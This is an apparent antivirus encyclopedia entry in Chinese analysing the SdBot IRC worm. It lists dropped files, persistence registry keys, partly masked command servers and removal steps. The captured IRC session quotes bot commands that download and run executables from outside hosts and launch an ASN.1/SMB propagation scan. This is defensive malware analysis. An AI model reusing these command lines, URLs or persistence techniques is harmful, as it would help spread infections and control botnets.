Backdoor.Win32.SdBot.awm

該病毒運行後,衍生病毒檔案到系統程式目錄下。添加註冊表自動運行項與系統服務項以實現隨機引導病毒體。創建大量執行緒用於掃描用戶所在網路,若發現存在默認共享或弱口令則傳播自身。此病毒為一個利用 Windows 平台下 IRC 協定的網路蠕蟲,受感染用戶可能會被操縱進行 Ddos 攻擊、遠程控制、傳送垃圾郵件、創建本地 Tftp 、 FTP 等行為。

基本介紹

  • 中文名:recsl機器人
  • 外文名:Backdoor.Win32.SdBot.awm
  • 病毒類型: 後門類
概述,行為分析,清除方案,

概述

病毒名稱: Backdoor.Win32.SdBot.awm
中文名稱: recsl機器人
病毒類型: 後門類
檔案 MD5: 2001D19F828FCE890562DDDB05D68797
公開範圍: 完全公開
危害等級: 5
檔案長度: 加殼後 76,583 位元組,脫殼後518,656 位元組
感染系統: WinNT4以上系統
開發工具: Microsoft Visual C++ 6.0
加殼類型 : PECompact變形殼
命名對照: AVG[Trojan horse IRC/BackDoor.SdBot2.SEB]
F-Prot[W32/Backdoor.AFUX]
McAfee [W32/Sdbot.worm.gen.l]

行為分析

衍生
1 、衍生下列副本與檔案:
%Temporary Internet Files%\1.exe
%Temporary Internet Files%\d.exe
%System32%\1.exe
%System32%\dl.exe
%System32%\helpersysem.exe  Trojan-Proxy.Win32.Slaper.e
%System32%\mysvcc.exe   Backdoor.Win32.SdBot.awm
%System32%\sysem.exe  Backdoor.Win32.IRCBot.aak
註冊表
2 、新建註冊表鍵值
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\sysms
Value: String: "C:\WINDOWS\System32\1.exe"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\msvccc66
Value: String: "dl.exe"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\mysvcig38
Value: String: "mysvcc.exe"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\sysms
Value: String: "C:\WINDOWS\System32\1.exe"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices\
msvccc66  Value: String: "dl.exe"
mysvcig38    Value: String: "mysvcc.exe"
3 、修改註冊表鍵值用以標記已感染:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Ole\EnableDCOM
New: String: "N"
Old: String: "Y"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\restrictanonymous
New: DWORD: 1 (0x1)
Old: DWORD: 0 (0)
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\restrictanonymous
New: DWORD: 1 (0x1)
Old: DWORD: 0 (0)
連線
4 、連線的 IRC 伺服器包括下列:
TCP->Server:66.1*9.*5.1*2:18080
TCP->Server:81.9*.1*8.2*4:16666
TCP->Server:209.1*0.*2.1*0:24104
5 、連線後的操作如下,包括從指定伺服器下載並運行檔案、對本地網路進行掃描檔案已分享資料夾等:
TCP->Server:66.1*9.*5.1*2:18080 :
NICK CHN|
USER fbwwty 0 0 :CHN|
:NEWSLbb 001 CHN| :MySQL CHN|[email protected]*1.7.2*3
:NEWSLbb 376 CHN| :
:CHN| MODE CHN| :+i
USERHOST CHN|
:NEWSLbb 302 CHN| :CHN|[email protected]*1.7.2*3
MODE CHN|+x+i
JOIN ##sl,##sl2 he 爃 e
:CHN|[email protected] JOIN :##sl
:NEWSLbb 332 CHN|##sl :. 燿 http://72.2*.1.2*0/d.exe dl.exe 1
:NEWSLbb 333 CHN|##sl 10:30 PM 1175724995
:NEWSLbb 366 CHN| ##sl :End of /NAMES list.
:CHN|!~fbwwty@2*2.1*1.7.213 JOIN :##sl2
:NEWSLbb 332 CHN| ##sl2 :. 燿 http://72.2*.4.1*6/1.exe 1.exe 1
:NEWSLbb 333 CHN|##sl2 10:30 PM 1175372145
:NEWSLbb 366 CHN| ##sl2 :End of /NAMES list.
PRIVMSG ##sl :[DOWNLOAD]: Downloading
URL: http://72.*0.1.2*0/d.exe to: dl.exe.
PRIVMSG ##sl2 :[DOWNLOAD]: Downloading
URL: http://72.20.4.126/1.exe to: 1.exe.
PRIVMSG ##sl :[DOWNLOAD]: Downloaded 62.0 KB to dl.exe @ 31.0 KB/sec.
PRIVMSG ##sl :[DOWNLOAD]: Opened: dl.exe.
PRIVMSG ##sl :[DOWNLOAD]: Opened: dl.exe.
PRIVMSG ##sl2 :[DOWNLOAD]: Downloaded 71.2 KB to 1.exe @ 7.1 KB/sec.
PRIVMSG ##sl2 :[DOWNLOAD]: Opened: 1.exe.
TCP->Server:81.9*.1*8.234:16666
NICK CHN|
USER tjyqnod 0 0 :CHN|
:MySQL 001 CHN| :MySQL CHN|!~tjyqnod@2*2.1*1.7.213
:MySQL 376 CHN| :
:CHN| MODE CHN| :+i
USERHOST CHN|
:MySQL 302 CHN| :CHN|=+~tjyqnod@2*2.1*1.7.213
MODE CHN| +x+i
JOIN ##last,##last2 fe 爁 e
:CHN|!~tjyqnod@2*2.1*1.7.213 JOIN :##last
:MySQL 332 CHN| ##last :.advscan asn1smb 50 5 0 -r
:MySQL 333 CHN| ##last 10:30 PM 1175586546
:MySQL 366 CHN| ##last :End of /NAMES list.
:CHN|!~tjyqnod@2*2.1*1.7.213 JOIN :##last2
:MySQL 366 CHN| ##last2 :End of /NAMES list.
PRIVMSG ##last :[SCAN]: Random Port Scan started on 10.0.x.x:445
with a delay of 5 seconds for 0 minutes using 50 threads.
註: % System% 是一個可變路徑。病毒通過查詢作業系統來決定當前 System 資料夾的位置。 Windows2000/NT 中默認的安裝路徑是 C:\Winnt\System32 , windows95/98/me 中默認的安裝路徑是 C:\Windows\System , windowsXP 中默認的安裝路徑是 C:\Windows\System32 。
--------------------------------------------------------------------------------

清除方案

1 、 使用安天木馬防線可徹底清除此病毒 ( 推薦 )
2 、 手工清除請按照行為分析刪除對應檔案,恢復相關係統設定。
(1) 使用安天木馬防線結束病毒進程:
1.exe
dl.exe
mysvcc.exe
(2) 病毒添加的註冊表項
HKEY_CURRENT_USER\Software\Microsoft\Windows\
CurrentVersion\Run\sysms
Value: String: "C:\WINDOWS\System32\1.exe"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\
CurrentVersion\Run\msvccc66
Value: String: "dl.exe"
CurrentVersion\Run\mysvcig38
Value: String: "mysvcc.exe"
CurrentVersion\Run\sysms
Value: String: C:\WINDOWS\System32\1.exe"
CurrentVersion\RunServices\msvccc66
Value: String: "dl.exe"
CurrentVersion\RunServices\mysvcig38
Value: String: "mysvcc.exe"
(3) 恢復註冊表下列鍵值為舊值:
New: String: "N"
Old: String: "Y"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\
restrictanonymous
New: DWORD: 1 (0x1)
Old: DWORD: 0 (0)
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\
restrictanonymous
New: DWORD: 1 (0x1)
Old: DWORD: 0 (0)
(4) 刪除病毒釋放檔案:
%Temporary Internet Files%\1.exe
%Temporary Internet Files%\d.exe
%System32%\1.exe
%System32%\dl.exe
%System32%\helpersysem.exe
%System32%\mysvcc.exe
%System32%\sysem.exe

熱門詞條

聯絡我們